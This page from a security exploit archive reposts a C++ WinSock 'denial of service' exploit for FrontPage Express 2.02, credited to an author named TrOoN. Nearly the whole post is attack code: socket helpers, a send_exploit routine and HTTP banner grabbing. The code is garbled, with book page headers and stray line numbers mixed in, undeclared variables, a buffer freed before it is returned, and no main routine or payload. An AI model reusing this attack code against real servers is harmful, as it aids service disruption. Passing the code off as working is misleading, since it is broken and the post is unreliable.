首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
frontpage_express2.02 Denial of Service winsock
来源: www.facebook.com/fysl.fyslm 作者:TrOoN 发布时间:2012-02-02   
# Title :frontpage_express2.02 Denial of Service winsock
# Author :TrOoN
# E-mail : SOUrRce-x@live.fr  | www.facebook.com/fysl.fyslm
# Home : city 617 logts  : Draria . algeria
# Web Site : www.1337day.com       |
# platform :  WinDows XP sp 2
# Type : local exploit /SHELL CODE  /ETc...
#Download link : http://www.jetelecharge.com/Internet/271.php

# waRn :  frontpage_express2.02 no frontpage
 ~~

######################################## Begin ##################################
#include <winsock2.h>
#pragma comment(lib,"ws2_32.lib")
#define STRING_MAX 65536
#define MAX 8388608
char *junk(char *input, int repeat)
{
int maxSize;
char *junkString = new char[STRING_MAX];
strcpy(junkString, "");

if( repeat < STRING_MAX && repeat > 0 && strlen(input) != 0
&& strlen(input) <= (STRING_MAX - 1))
{
maxSize = (STRING_MAX - 1)/strlen(input);
for(int count = 0; count < repeat
&& count < maxSize; count++)
{
strcat(junkString, input);
}
}
else
{
23 printf("Invalid Perameters! \n");
strcpy(junkString,"--FAILURE--");
 : }
delete [ ] junkString;
return (junkString);
}
bool is_up(char *targetip, int port)
{
WSADATA wsaData;
WORD wVersionRequested;
struct hostent target_ptr;
struct sockaddr_in sock;
SOCKET MySock;
wVersionRequested = MAKEWORD(2, 2);
3if (WSAStartup(wVersionRequested, &wsaData) < 0)
{
printf("############ERROR!####################\n");
printf("Your ws2_32.dll is too old to use this
application. \n");
printf("Go to microsofts web site to download the most
recent \n");
42 printf("version of ws2_32.dll.
\n");

Frontpage Denial of Service  WinSock • Case Study 1 145
WSACleanup();
return (FALSE);
}
MySock = socket(AF_INET, SOCK_STREAM, 0);
if(MySock==INVALID_SOCKET)
{
printf("Socket error!\r\n");
closesocket(MySock);
WSACleanup();
return (FALSE);
}
if ((pTarget = gethostbyname(targetip)) == NULL)
{
printf("\nResolve of %s failed, please try again.\n",
targetip);

closesocket(MySock);
WSACleanup();
return (FALSE);
 }
 memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
sock.sin_family = AF_INET;
sock.sin_port = htons((USHORT)port);
if ( (connect(MySock, (struct sockaddr *)&sock, sizeof (sock) )))
{
 closesocket(MySock);
WSACleanup();

return (FALSE);
 }
 else
{
closesocket(MySock);
WSACleanup();
return (TRUE);
}
}
 bool is_string_in(char *needle, char *haystack)
 {
 char *loc = strstr(haystack, needle);
if( loc != NULL )
{
return(TRUE);
 }
 else
{
return(FALSE);
 }
 }
char *replace_string(char *new_str, char *old_str, char *whole_str)
 Case Study 1 • Frontpage Denial of Service Utilizing WinSock
{
 int len = strlen(old_str);
char buffer[MAX] = "";
char *loc = strstr(whole_str, old_str);
 if(loc != NULL)
 {
 strncpy(buffer, whole_str, loc-whole_str );
strcat(buffer, new_str);
 strcat(buffer, loc + (strlen(old_str)));
 strcpy(whole_str, buffer);
 }
 return whole_str;
 }
 char *send_exploit(char *targetip, int port, char *send_string)
 {
 WSADATA wsaData;
 WORD wVersionRequested;
 struct hostent target_ptr;
 struct sockaddr_in sock;
 SOCKET MySock;
 wVersionRequested = MAKEWORD(2, 2);
 if (WSAStartup(wVersionRequested, &wsaData) != 0)
 {
 printf("############### ERROR!######################\n");
 printf("Your ws2_32.dll is too old to use this
application. \n");
 printf("Go to Microsoft's web site to download the most
recent \n");
 printf("version of ws2_32.dll.
\n");
 WSACleanup();
 exit(1);
 }
 MySock = socket(AF_INET, SOCK_STREAM, 0);
if(MySock==INVALID_SOCKET)
 {
 printf("Socket error!\r\n");

 closesocket(MySock);
WSACleanup();
 exit(1);
 }
if ((pTarget = gethostbyname(targetip)) == NULL)
 { printf("Resolve of %s failed, please try again.\n",
targetip);

 closesocket(MySock);
 WSACleanup();
 exit(1);
Frontpage Denial of Service Utilizing WinSock • Case Study 1 147
 }
 memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
 sock.sin_family = AF_INET;
 sock.sin_port = htons((USHORT)port);

 if ( (connect(MySock, (struct sockaddr *)&sock, sizeof (sock) )))
 {
 printf("Couldn't connect to host.\n");

 closesocket(MySock);
 WSACleanup();
 exit(1);
 }
 char sendfile[STRING_MAX];
 strcpy(sendfile, send_string);
 if (send(MySock, sendfile, sizeof(sendfile)-1, 0) == -1)
 {
 printf("Error sending Packet\r\n");
 closesocket(MySock);
 exit(1);
 }

 send(MySock, sendfile, sizeof(sendfile)-1, 0);
 char *recvString = new char[MAX];
 int nret;
nret = recv(MySock, recvString, MAX + 1, 0);
char *output= new char[nret];
strcpy(output, "");
if (nret == SOCKET_ERROR)
 {
 printf("Attempt to receive data FAILED. \n");
 }
 else
 {
 strncat(output, recvString, nret);
 delete [ ] recvString;
 }
 closesocket(MySock);
 WSACleanup();
 return (output);
 delete [ ] output;
 }
 char *get_http(char *targetip, int port, char *file)
 {
 WSADATA wsaData;
 WORD wVersionRequested;
 struct hostent target_ptr;
 struct sockaddr_in sock;
 SOCKET MySock;
 Case Study 1 • Frontpage Denial of Service Utilizing WinSock

 wVersionRequested = MAKEWORD(2, 2);
 if (WSAStartup(wVersionRequested, &wsaData) < 0)
 {
 printf("################# ERROR! ###################\n");
 printf("Your ws2_32.dll is too old to use this
application. \n");
 printf("Go to microsofts web site to download the most
recent \n");
195 printf("version of ws2_32.dll.
\n");

 WSACleanup();
 exit(1);
 }
 MySock = socket(AF_INET, SOCK_STREAM, 0);
 if(MySock==INVALID_SOCKET)
 {
 printf("Socket error!\r\n");

 closesocket(MySock);
 WSACleanup();
 exit(1);
 }
 if ((pTarget = gethostbyname(targetip)) == NULL)
 {
 printf("Resolve of %s failed, please try again.\n",
targetip);

 closesocket(MySock);
 WSACleanup();
 exit(1);
 }
 memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
 sock.sin_family = AF_INET;
 sock.sin_port = htons((USHORT)port);

 if ( (connect(MySock, (struct sockaddr *)&sock, sizeof (sock) )))
 {
 printf("Couldn't connect to host.\n");

 closesocket(MySock);
 WSACleanup();
 exit(1);
 }
 char sendfile[STRING_MAX];
 strcpy(sendfile, "GET ");
 strcat(sendfile, file);
 strcat(sendfile, " HTTP/1.1 \r\n" );
 strcat(sendfile, "Host: localhost\r\n\r\n");
Frontpage Denial of Service Utilizing WinSock • Case Study 1 149
 if (send(MySock, sendfile, sizeof(sendfile)-1, 0) == -1)
{
 printf("Error sending Packet\r\n");
 closesocket(MySock);
 WSACleanup();
 exit(1);
 }
 send(MySock, sendfile, sizeof(sendfile)-1, 0);

 char *recvString = new char[MAX];
 int nret;
 nret = recv(MySock, recvString, MAX + 1, 0);

 char *output= new char[nret];
 strcpy(output, "");
 if (nret == SOCKET_ERROR)
 {
 printf("Attempt to receive data FAILED. \n");
 }
 else
 {
strncat(output, recvString, nret);
 delete [ ] recvString;
 }
 closesocket(MySock);
 WSACleanup();
 return (output);
 delete [ ] output;
 }
 char *banner_grab(char *targetip, int port)
{
 char start_banner[] = "Server:";
 char end_banner[] = "\n";
 int start = 0;
 int end = 0;
 char* ret_banner = new char[MAX];
char* buffer = get_http(targetip, port, "/");

int len = strlen(buffer);

 char *pt = strstr(buffer, start_banner );

 if( pt != NULL )
 {
 start = pt - buffer;
 for(int x = start; x < len; x++)
 {
 if(_strnicmp( buffer + x, end_banner, 1 ) == 0)
 {
 Case Study 1 • Frontpage Denial of Service Utilizing WinSock
 end = x;
 x = len;
 }
 }
 strcpy(ret_banner, " ");
 strncat (ret_banner, buffer + start - 1 , (end - start));
 }
 else
 {
 strcpy(ret_banner, "EOF");
 }
 return (ret_banner);
 delete [ ] ret_banner;
 }
  ################### ENd ########################

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Mindjet MindManager 2012 10.0.
·Apache httpOnly Cookie Disclos
·windows xp sp2 [ arabic] mech
·EdrawSoft Office Viewer Compon
·Sunway Forcecontrol SNMP NetDB
·Adobe Flash Player MP4 Sequenc
·Icona SpA C6 Messenger Downloa
·sudo 1.8.0 - 1.8.3p1 Format St
·OfficeSIP Server 3.1 Denial Of
·Tracker Software pdfSaver Acti
·NetSarang Xlpd Printer Daemon
·MS12-004 midiOutPlayNextPolyEv
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved